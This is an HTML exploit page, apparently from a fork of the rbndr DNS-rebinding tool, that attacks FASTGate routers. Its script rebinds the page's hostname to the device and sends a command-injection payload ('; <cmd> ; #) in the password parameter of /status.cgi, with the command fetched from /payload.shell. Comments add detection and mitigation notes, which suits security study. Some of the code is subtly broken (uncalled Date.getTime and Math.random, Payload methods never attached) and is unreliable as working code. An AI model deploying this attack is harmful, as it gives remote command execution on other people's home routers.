forked from taviso/rbndr
exploit.html
<html>
<head>
<title>FASTGate targeted remote exploitation service</title>
<script>
var ajax, exploit, isthisyou, mp, random_string, token;
/**
 * Blocking GET helper used by every request this page makes.
 *
 * Encodes `params` into a query string, attaches two fixed headers plus any
 * caller-supplied ones, and waits for the response before returning.
 * Callers in this file pass relative paths, which resolve against the page's
 * own origin and so go to whatever address that hostname resolves to at the
 * time of the call.
 *
 * @param {string} url - Path or URL to request.
 * @param {Object<string, string>} [params] - Query parameters; any truthy
 *   value (even an empty object) causes "?" plus the encoded string to be appended.
 * @param {Object<string, string>} [hdrs] - Extra request headers.
 * @returns {?string} The response text on HTTP 200; null for any other
 *   status or when anything in the request path throws.
 */
ajax = function(url, params, hdrs) {
  try {
    const xhr = new XMLHttpRequest();
    const query = new URLSearchParams();
    let target = url;
    if (params) {
      Object.entries(params).forEach(([name, value]) => {
        query.append(name, value);
      });
      target += "?" + query.toString();
    }
    // A falsy third argument makes the request synchronous: send() blocks
    // the calling thread until the response (or an error) arrives.
    xhr.open('GET', target, false);
    xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    if (hdrs) {
      Object.entries(hdrs).forEach(([name, value]) => {
        xhr.setRequestHeader(name, value);
      });
    }
    xhr.send();
    return xhr.status === 200 ? xhr.responseText : null;
  } catch (err) {
    // Every failure mode is flattened to "no result"; callers only test truthiness.
    return null;
  }
};
/**
 * Returns a string of characters drawn from [a-zA-Z0-9].
 *
 * The loop counts from 0 towards `len` in whichever direction `len` lies, so a
 * negative length yields as many characters as its magnitude.
 *
 * Math.random() is not a CSPRNG. In this file the output is only used for a
 * cache-busting query value and a throwaway username, so predictability is
 * not a concern here; do not reuse this for tokens or secrets.
 *
 * @param {number} len - Number of characters to generate.
 * @returns {string} The generated string ('' when len is 0).
 */
random_string = function(len) {
  const alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789';
  const countsUp = 0 <= len;
  let out = '';
  let step = 0;
  while (countsUp ? step < len : step > len) {
    // charAt truncates the fractional index, giving a uniform pick over the alphabet.
    out += alphabet.charAt(Math.random() * alphabet.length);
    step += countsUp ? 1 : -1;
  }
  return out;
};
// Builds and sends the crafted `login_confirm` request to /status.cgi.
//
// cmd   - text spliced verbatim into the `password` query parameter.
// token - value sent in the X-XSRF-TOKEN header. The caller also writes the
//         same value into the XSRF-TOKEN cookie, so this is a double-submit
//         token that the page chooses for itself.
// Returns whatever ajax() returns: the response body on HTTP 200, else null.
//
// Defender notes:
// - The password value has the shape  '; <cmd> ; #  (close quote, statement
//   separator, trailing comment). That only has an effect if the device-side
//   handler interpolates the field into a shell command line, which is not
//   visible in this file; the fix belongs there (treat credentials as data,
//   never pass them through a shell).
// - Detection: GET /status.cgi with nvget=login_confirm and sessionKey=NULL
//   whose password contains a quote, ';' or '#', or whose `_` value contains
//   the literal "pytester".
// - A double-submit XSRF token does not protect against a page that is
//   same-origin with the device (for example after DNS rebinding), because
//   that page controls both the cookie and the header.
exploit = function(cmd, token) {
var hdrs, params;
params = {
// Unique-per-call value: a rounded seconds timestamp, the literal "pytester", and 12 random characters.
'_': (Math.round((new Date).getTime() / 1000)) + "pytester" + (random_string(12)),
'sessionKey': 'NULL',
'cmd': '3',
'nvget': 'login_confirm',
// Throwaway 4-character username; no real credentials are supplied.
'username': random_string(4),
// Injection point: caller-supplied text is wrapped in shell metacharacters.
'password': "'; " + cmd + " ; #"
};
hdrs = {
'X-XSRF-TOKEN': token,
// NOTE(review): browsers treat DNT and Cookie as forbidden request-header
// names for XHR, so these two entries are presumably ignored and cookies
// travel via the normal cookie jar instead; confirm for the browser in use.
'DNT': '1',
'Cookie': document.cookie
};
return ajax('/status.cgi', params, hdrs);
};
// Probe: requests /status.cgi on the page's own origin with only a
// unique-per-call `_` parameter (ending in 12 random characters) and no extra
// headers.
// Returns the response body when the request comes back HTTP 200 and null
// otherwise; callers only test truthiness, so an empty 200 body also counts
// as "no".
// The rest of the script reads a truthy result as "this hostname currently
// reaches the device", presumably because the rbndr hostname alternates
// between the hosting server and the device address (confirm against the
// rbndr setup, which is not shown here).
isthisyou = function() {
return ajax('/status.cgi', {
'_': (Math.round(Date.getTime / 1000)) + "pytester" + (random_string(12))
});
};
// Payload: holder for the command text fetched from /payload.shell.
// The constructor is assigned onto the top-level `this`, which is the window
// object in a classic script such as this one.
// NOTE(review): in this listing the IIFE returns only the empty constructor;
// set, hasnot and get are closure locals and nothing here attaches them to
// Payload or its prototype. The layout looks like transpiler output, so the
// original source may have differed.
this.Payload = (function() {
var get, hasnot, set;
function Payload() {}
// Fetch /payload.shell only while the isthisyou() probe fails, i.e.
// presumably while the hostname still points at the server hosting this page
// rather than at the device.
set = function() {
if (!isthisyou()) {
this.code = ajax('/payload.shell');
}
};
// True while this.code is null or undefined (loose == null covers both).
hasnot = function() {
return this.code == null;
};
// Returns the fetched text, or undefined if nothing has been stored yet.
get = function() {
return this.code;
};
return Payload;
})();
// Driver. Statement order matters:
//   1. Loop on mp.hasnot() / mp.set() until the payload text is held.
//   2. Compute a token and store it in the XSRF-TOKEN cookie for this page's
//      origin; exploit() later echoes the same value in X-XSRF-TOKEN.
//   3. Loop until the isthisyou() probe succeeds, then send exactly one
//      exploit() request and stop.
// Both loops are unbounded busy-waits over synchronous XHR, so the tab stays
// blocked for as long as they run; a burst of back-to-back /status.cgi
// requests from one page is itself a usable detection signal.
// Network-side mitigations for this pattern: rebinding protection on the
// resolver (refuse public names that answer with private addresses) and
// Host-header validation on the device's web interface.
mp = new Payload;
while (mp.hasnot()) {
mp.set();
}
token = Math.round(Math.random * 100000000000);
document.cookie = "XSRF-TOKEN=" + token;
while (true) {
if (isthisyou()) {
exploit(mp.get(), token);
break;
}
}
</script>
</head>
<body>
<p>Hello visitor, this is a demonstration page.</p>
</body>
</html>